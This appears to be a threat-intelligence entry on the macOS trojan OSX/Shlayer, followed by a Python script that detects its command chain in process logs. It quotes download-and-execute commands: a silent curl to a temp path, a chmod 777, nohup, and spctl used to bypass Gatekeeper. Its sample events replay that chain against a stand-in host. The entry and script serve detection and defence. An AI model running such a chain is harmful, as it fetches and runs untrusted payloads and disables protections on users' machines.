
OSX/Shlayer

OSX/Shlayer is a Trojan designed to install adware on macOS that was first discovered in 2018.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)
ID: S0402
Associated Software: Crossrider, Zshlayer
Type: MALWARE
Platforms: macOS
Version: 1.4
Created: 29 Aug 2019
Last Modified: 30 Aug 2023

Associated Software Descriptions

Name Description
Crossrider (Citation: Intego Shlayer Apr 2018)(Citation: Malwarebytes Crossrider Apr 2018)
Zshlayer (Citation: sentinelone shlayer to zshlayer)

Techniques Used

Domain ID Name Use
Enterprise T1548 .004 Abuse Elevation Control Mechanism: Elevated Execution with Prompt

OSX/Shlayer can escalate privileges to root by asking the user for credentials.(Citation: Carbon Black Shlayer Feb 2019)

Enterprise T1059 .004 Command and Scripting Interpreter: Unix Shell

OSX/Shlayer can use bash scripts to check the macOS version, download payloads, and extract bytes from files. OSX/Shlayer uses the command `sh -c tail -c +1381...` to extract bytes at an offset from a specified file. OSX/Shlayer uses the `curl -fsL "$url" >$tmp_path` command to download malicious payloads into a temporary directory.(Citation: Carbon Black Shlayer Feb 2019)(Citation: sentinelone shlayer to zshlayer)(Citation: 20 macOS Common Tools and Techniques)(Citation: objectivesee osx.shlayer apple approved 2020)

Enterprise T1222 .002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification

OSX/Shlayer can use the `chmod` utility to set a file as executable, such as `chmod 777` or `chmod +x`.(Citation: 20 macOS Common Tools and Techniques)(Citation: Carbon Black Shlayer Feb 2019)(Citation: Shlayer jamf gatekeeper bypass 2021)

Enterprise T1564 .001 Hide Artifacts: Hidden Files and Directories

OSX/Shlayer has executed a .command script from a hidden directory in a mounted DMG.(Citation: Carbon Black Shlayer Feb 2019)

Enterprise T1564 .009 Hide Artifacts: Resource Forking

OSX/Shlayer has used a resource fork to hide a compressed binary copy of itself from the terminal and Finder, and potentially to evade traditional scanners that only inspect the data fork.(Citation: tau bundlore erika noerenberg 2020)(Citation: sentinellabs resource named fork 2020)

Enterprise T1564 .011 Hide Artifacts: Ignore Process Interrupts

OSX/Shlayer has used the `nohup` command to instruct executed payloads to ignore hangup signals.(Citation: Shlayer jamf gatekeeper bypass 2021)

Enterprise T1036 .005 Masquerading: Match Legitimate Name or Location

OSX/Shlayer can masquerade as a Flash Player update.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)

Enterprise T1553 .001 Subvert Trust Controls: Gatekeeper Bypass

If running with elevated privileges, OSX/Shlayer has used the `spctl` command to disable Gatekeeper protection for a downloaded file. OSX/Shlayer can also leverage system links pointing to bash scripts in the downloaded DMG file to bypass Gatekeeper, a flaw patched in macOS 11.3 and later versions. OSX/Shlayer has been notarized by Apple, resulting in successful passing of additional Gatekeeper checks.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Shlayer jamf gatekeeper bypass 2021)(Citation: objectivesee osx.shlayer apple approved 2020)

Enterprise T1204 .002 User Execution: Malicious File

OSX/Shlayer has relied on users mounting and executing a malicious DMG file.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)
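The technique entries above (T1059.004, T1222.002, T1564.001, T1564.011, T1553.001 and T1548.004) describe a chain of ordinary macOS commands whose individual members (`tail`, `chmod +x`, `curl`) are everyday admin activity. The following detection script is an added example written for this page, not ATT&CK or SECURITM code: it scans constructed process-execution records (the `pid=... ppid=... user=... cmd=...` line format and the sample events are assumptions made for the example, not a real EDR schema), matches each command line against narrow per-technique patterns, and then correlates hits by parent process so a verdict rests on several techniques co-occurring rather than on any single command.

```python
import re
from collections import defaultdict

# Constructed sample process-execution records (not real telemetry). Each
# line carries pid, parent pid, user and the command line; the first five
# mimic the Shlayer chain described on this page, the rest are benign noise.
SAMPLE_EVENTS = [
    "pid=811 ppid=700 user=jdoe cmd=sh -c tail -c +1381 /Volumes/Install/.hidden/Install.command > /tmp/x9/p.zip",
    "pid=812 ppid=700 user=jdoe cmd=/bin/bash -c curl -fsL https://update.example.invalid/p >/tmp/x9/payload",
    "pid=813 ppid=700 user=jdoe cmd=chmod 777 /tmp/x9/payload",
    "pid=814 ppid=700 user=jdoe cmd=nohup /tmp/x9/payload",
    "pid=815 ppid=700 user=root cmd=spctl --add /tmp/x9/payload",
    "pid=901 ppid=880 user=dev cmd=tail -n 20 /var/log/system.log",
    "pid=902 ppid=880 user=dev cmd=chmod +x ./build.sh",
    "pid=903 ppid=880 user=dev cmd=curl -s https://api.example.invalid/health",
]

# Assumed record layout for this example (not a real EDR schema).
EVENT_RE = re.compile(r"^pid=(\d+) ppid=(\d+) user=(\S+) cmd=(.*)$")
TMP = r"/(?:private/)?tmp/"   # both spellings of the macOS temp directory

# (technique id, description, pattern). Patterns are deliberately narrow:
# "tail" or "chmod +x" on their own are routine admin/developer activity.
RULES = [
    ("T1059.004", "byte-offset carve with tail -c +N",
     re.compile(r"\btail\s+-c\s+\+\d+")),
    ("T1059.004", "silent curl download redirected into a temp path",
     re.compile(r"\bcurl\s+-[A-Za-z]*s[A-Za-z]*\s.*>\s*" + TMP)),
    ("T1222.002", "chmod making a temp-path file executable",
     re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\s+" + TMP)),
    ("T1564.001", ".command script under a hidden directory on a mounted volume",
     re.compile(r"/Volumes/\S*/\.[^/\s]+/\S*\.command\b")),
    ("T1564.011", "nohup wrapping a temp-path payload",
     re.compile(r"\bnohup\s+" + TMP)),
    ("T1553.001", "spctl used to whitelist a file or disable Gatekeeper",
     re.compile(r"\bspctl\s+--(?:add|master-disable|disable)\b")),
]


def parse_event(line):
    """Split one constructed record into its fields."""
    m = EVENT_RE.match(line)
    if not m:
        raise ValueError(f"unparseable event: {line!r}")
    pid, ppid, user, cmd = m.groups()
    return {"pid": int(pid), "ppid": int(ppid), "user": user, "cmd": cmd}


def match_rules(cmd):
    """Return [(technique_id, description)] for every rule the command line trips."""
    return [(tid, desc) for tid, desc, pat in RULES if pat.search(cmd)]


def correlate(lines):
    """Group hits by parent pid so the chain is judged as a whole, not per command."""
    sessions = defaultdict(lambda: {"techniques": set(), "users": set(), "hits": []})
    for line in lines:
        ev = parse_event(line)
        s = sessions[ev["ppid"]]
        s["users"].add(ev["user"])
        for tid, desc in match_rules(ev["cmd"]):
            s["techniques"].add(tid)
            s["hits"].append((ev["pid"], tid, desc))
    # Heuristic for T1548.004: one parent spawned both unprivileged and root
    # children alongside other hits, consistent with a credential prompt mid-chain.
    for s in sessions.values():
        if "root" in s["users"] and len(s["users"]) > 1 and s["techniques"]:
            s["techniques"].add("T1548.004")
    return dict(sessions)


def flag_sessions(lines, min_techniques=3):
    """Parent pids whose children show at least min_techniques distinct techniques."""
    return sorted(ppid for ppid, s in correlate(lines).items()
                  if len(s["techniques"]) >= min_techniques)


if __name__ == "__main__":
    sessions = correlate(SAMPLE_EVENTS)
    for ppid in flag_sessions(SAMPLE_EVENTS):
        print(f"ppid {ppid}: {sorted(sessions[ppid]['techniques'])}")
        for pid, tid, desc in sessions[ppid]["hits"]:
            print(f"  pid {pid} {tid} {desc}")
```

On the constructed input only the session under ppid 700 is flagged; the developer session under ppid 880 trips no rule even though it runs `tail`, `chmod +x` and `curl`, because each pattern also requires the Shlayer-specific context (byte offset, temp-path target, hidden directory, redirect into `/tmp`). Real telemetry needs the same idea applied to the actual process-tree and command-line fields of the EDR in use, and the `min_techniques` threshold tuned against baseline noise.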
